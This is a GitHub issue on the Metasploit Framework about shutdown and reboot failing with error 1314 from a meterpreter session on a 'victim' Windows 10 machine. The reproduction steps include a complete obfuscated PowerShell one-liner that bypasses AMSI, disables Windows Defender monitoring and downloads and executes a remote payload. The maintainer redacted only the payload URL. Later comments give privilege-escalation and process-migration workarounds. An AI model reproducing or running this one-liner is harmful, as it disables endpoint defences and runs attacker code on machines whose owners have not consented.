rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

stdapi_sys_power_exitwindows: Operation failed: 1314 #14675

Closed GetRektBoy724 closed 3 years ago

GetRektBoy724 commented 3 years ago

Steps to reproduce

How'd you do it?

  1. open victim's cmd as admin
  2. enter this one-liner powershell.exe -nop -ep bypass -NoExit -Command "[Ref].Assembly.GetType('System.Management.Automation.'+$([cHAr]([ByTE]0x41)+[cHAr]([byte]0x6D)+[ChAR](115)+[char]([bYtE]0x69))+'Utils').GetField($([systeM.NET.WEbUtIliTY]::HtMldECoDe('amsiInitFailed')),'NonPublic,Static').SetValue($null,$true);;Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;;Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;;Set-MpPreference -DisableScriptScanning $true;;IEX(New-Object Net.WebClient).DownloadString('https://[redacted]');"
  3. get a meterpreter shell
  4. type getsystem -t 2 on the meterpreter shell

This section should also tell us any relevant information about the environment; for example, if an exploit that used to work is failing, tell us the victim operating system and service versions.

Windows 10 v20H2

Were you following a specific guide/tutorial or reading documentation?

nope

Expected behavior

What should happen?

I can shut down and reboot the victim's system.

Current behavior

I get stdapi_sys_power_exitwindows: Operation failed: 1314 for the shutdown and reboot commands.

Metasploit version

metasploit v6.0.26-dev

smcintyre-r7 commented 3 years ago

Please don't link to live payloads, I updated your post to remove the URL.

Looks like error 1314 is ERROR_PRIVILEGE_NOT_HELD. Did getsystem succeed? I'm guessing that it failed and that you lack the privileges necessary to perform the operation.

GetRektBoy724 commented 3 years ago

Yeah, the getsystem succeeds. Even with a normal user, reboot and shutdown work normally.

GetRektBoy724 commented 3 years ago

anyone can help me? :')

GetRektBoy724 commented 3 years ago

Meh, found a workaround: after getting an administrator meterpreter shell, use getsystem, then migrate to another Windows process that also runs as NT AUTHORITY\SYSTEM, and after that reboot and shutdown work normally.

Nnutural commented 1 month ago

(screenshot attached) A useful solution

smcintyre-r7 commented 1 month ago

If you're running as SYSTEM, the getprivs command might be able to get the necessary privileges to shutdown/reboot.